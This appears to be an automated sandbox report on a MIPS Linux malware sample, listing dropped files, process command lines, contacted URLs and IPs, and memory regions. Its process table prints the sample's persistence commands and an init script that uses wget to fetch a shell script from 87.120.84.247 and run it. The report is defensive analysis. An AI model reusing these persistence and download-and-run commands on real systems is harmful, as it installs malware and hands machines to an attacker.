Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
mips.nn.elf
|
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
|
initial sample
|
||
/etc/init.d/mips.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.jsRlWF (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.tM56AMu5de /tmp/tmp.NEKDqhHxdl /tmp/tmp.Jndop9wNRb
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.tM56AMu5de /tmp/tmp.NEKDqhHxdl /tmp/tmp.Jndop9wNRb
|
||
/tmp/mips.nn.elf
|
/tmp/mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf
&\n wget http://87.120.84.247/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0
{start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 42 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://87.120.84.247/
|
unknown
|
||
http://87.120.84.247/curl.sh
|
unknown
|
||
http://87.120.84.247/lol.sh
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
210.111.34.57
|
unknown
|
Korea Republic of
|
||
95.203.118.162
|
unknown
|
Sweden
|
||
163.69.189.26
|
unknown
|
France
|
||
105.37.230.254
|
unknown
|
Egypt
|
||
159.35.197.217
|
unknown
|
United States
|
||
58.152.39.181
|
unknown
|
Hong Kong
|
||
78.99.186.229
|
unknown
|
Slovakia (SLOVAK Republic)
|
||
121.47.93.63
|
unknown
|
China
|
||
142.108.126.82
|
unknown
|
Canada
|
||
105.238.243.184
|
unknown
|
Sudan
|
||
191.207.145.221
|
unknown
|
Brazil
|
||
49.231.179.65
|
unknown
|
Thailand
|
||
40.84.79.233
|
unknown
|
United States
|
||
200.49.135.19
|
unknown
|
Argentina
|
||
156.85.149.133
|
unknown
|
United States
|
||
97.173.148.106
|
unknown
|
United States
|
||
120.253.183.126
|
unknown
|
China
|
||
201.213.173.29
|
unknown
|
Argentina
|
||
16.136.52.223
|
unknown
|
United States
|
||
8.59.22.93
|
unknown
|
United States
|
||
126.163.155.63
|
unknown
|
Japan
|
||
16.84.67.40
|
unknown
|
United States
|
||
61.85.56.98
|
unknown
|
Korea Republic of
|
||
124.220.251.253
|
unknown
|
China
|
||
78.0.46.255
|
unknown
|
Croatia (LOCAL Name: Hrvatska)
|
||
90.143.129.97
|
unknown
|
Sweden
|
||
177.45.204.149
|
unknown
|
Brazil
|
||
137.243.234.37
|
unknown
|
United States
|
||
27.16.176.17
|
unknown
|
China
|
||
134.198.73.200
|
unknown
|
United States
|
||
136.79.129.102
|
unknown
|
United States
|
||
20.167.137.74
|
unknown
|
United States
|
||
161.139.210.188
|
unknown
|
Malaysia
|
||
9.60.44.44
|
unknown
|
United States
|
||
139.74.142.43
|
unknown
|
Finland
|
||
116.11.222.147
|
unknown
|
China
|
||
91.128.10.233
|
unknown
|
Austria
|
||
13.186.30.255
|
unknown
|
United States
|
||
152.210.97.253
|
unknown
|
United States
|
||
91.177.82.239
|
unknown
|
Belgium
|
||
170.96.137.3
|
unknown
|
United States
|
||
198.4.188.102
|
unknown
|
United States
|
||
91.6.152.230
|
unknown
|
Germany
|
||
123.255.122.76
|
unknown
|
Hong Kong
|
||
129.122.145.241
|
unknown
|
Angola
|
||
83.70.56.66
|
unknown
|
Ireland
|
||
47.29.76.193
|
unknown
|
India
|
||
98.122.103.200
|
unknown
|
United States
|
||
221.148.160.192
|
unknown
|
Korea Republic of
|
||
100.9.112.197
|
unknown
|
United States
|
||
108.99.38.240
|
unknown
|
United States
|
||
112.112.252.59
|
unknown
|
China
|
||
123.103.188.180
|
unknown
|
Japan
|
||
104.39.255.2
|
unknown
|
United States
|
||
172.105.84.134
|
unknown
|
United States
|
||
171.142.5.213
|
unknown
|
United States
|
||
110.162.129.164
|
unknown
|
Japan
|
||
81.73.176.48
|
unknown
|
Italy
|
||
99.235.109.202
|
unknown
|
Canada
|
||
28.57.227.187
|
unknown
|
United States
|
||
78.211.17.129
|
unknown
|
France
|
||
218.250.225.7
|
unknown
|
Hong Kong
|
||
37.173.129.71
|
unknown
|
France
|
||
39.211.160.147
|
unknown
|
Indonesia
|
||
206.99.77.209
|
unknown
|
United States
|
||
23.20.35.241
|
unknown
|
United States
|
||
156.48.81.6
|
unknown
|
United Kingdom
|
||
32.51.118.139
|
unknown
|
United States
|
||
168.96.250.74
|
unknown
|
Argentina
|
||
161.35.223.150
|
unknown
|
United States
|
||
111.177.208.17
|
unknown
|
China
|
||
182.141.251.85
|
unknown
|
China
|
||
193.143.1.70
|
unknown
|
unknown
|
||
47.241.54.126
|
unknown
|
United States
|
||
76.144.56.62
|
unknown
|
United States
|
||
163.7.182.31
|
unknown
|
New Zealand
|
||
202.59.101.92
|
unknown
|
Australia
|
||
100.203.234.248
|
unknown
|
United States
|
||
206.86.233.213
|
unknown
|
United States
|
||
174.198.148.228
|
unknown
|
United States
|
||
102.230.206.207
|
unknown
|
unknown
|
||
37.49.84.151
|
unknown
|
Germany
|
||
170.38.80.177
|
unknown
|
Malaysia
|
||
170.232.108.131
|
unknown
|
United States
|
||
212.129.25.56
|
unknown
|
France
|
||
152.121.32.199
|
unknown
|
United States
|
||
5.236.26.249
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
149.210.209.177
|
unknown
|
Netherlands
|
||
68.229.115.27
|
unknown
|
United States
|
||
63.62.242.255
|
unknown
|
United States
|
||
74.162.122.5
|
unknown
|
United States
|
||
58.111.46.149
|
unknown
|
Australia
|
||
106.9.87.117
|
unknown
|
China
|
||
3.46.75.174
|
unknown
|
United States
|
||
70.183.32.6
|
unknown
|
United States
|
||
28.196.103.87
|
unknown
|
United States
|
||
104.247.124.255
|
unknown
|
Reserved
|
||
46.202.153.238
|
unknown
|
Ukraine
|
||
158.98.222.214
|
unknown
|
United States
|
||
20.240.176.192
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fc31c420000
|
page execute read
|
|||
7fc31c420000
|
page execute read
|
|||
7fc3a3994000
|
page read and write
|
|||
55d9a7a85000
|
page read and write
|
|||
7fc3a333c000
|
page read and write
|
|||
7ffde15da000
|
page execute read
|
|||
7fc3a3319000
|
page read and write
|
|||
7fc3a3359000
|
page read and write
|
|||
7fc31c465000
|
page read and write
|
|||
7fc3a386b000
|
page read and write
|
|||
7fc3a39e1000
|
page read and write
|
|||
7fc3a2cc8000
|
page read and write
|
|||
7fc31c461000
|
page read and write
|
|||
7fc3a333c000
|
page read and write
|
|||
7fc39c000000
|
page read and write
|
|||
55d9a46cf000
|
page read and write
|
|||
55d9a66e4000
|
page read and write
|
|||
7fc39c021000
|
page read and write
|
|||
7fc31c465000
|
page read and write
|
|||
7fc3a2cba000
|
page read and write
|
|||
7fc31c461000
|
page read and write
|
|||
55d9a7a85000
|
page read and write
|
|||
7fc3a2f78000
|
page read and write
|
|||
7fc3a368a000
|
page read and write
|
|||
55d9a46c5000
|
page read and write
|
|||
7fc39c021000
|
page read and write
|
|||
55d9a66e4000
|
page read and write
|
|||
7fc3a399c000
|
page read and write
|
|||
55d9a46cf000
|
page read and write
|
|||
55d9a66cd000
|
page execute and read and write
|
|||
7ffde15d4000
|
page read and write
|
|||
7fc3a2cba000
|
page read and write
|
|||
55d9a46c5000
|
page read and write
|
|||
7fc3a24b2000
|
page read and write
|
|||
7fc3a39e1000
|
page read and write
|
|||
7fc3a3319000
|
page read and write
|
|||
7fc3a368a000
|
page read and write
|
|||
7ffde15da000
|
page execute read
|
|||
55d9a443d000
|
page execute read
|
|||
7fc3a399c000
|
page read and write
|
|||
7fc39c000000
|
page read and write
|
|||
7fc3a24b2000
|
page read and write
|
|||
7ffde15d4000
|
page read and write
|
|||
55d9a66cd000
|
page execute and read and write
|
|||
7fc3a386b000
|
page read and write
|
|||
7fc3a3359000
|
page read and write
|
|||
7fc3a2f78000
|
page read and write
|
|||
55d9a443d000
|
page execute read
|
|||
7fc3a2cc8000
|
page read and write
|
|||
7fc3a3994000
|
page read and write
|
|||
7fc31c46a000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.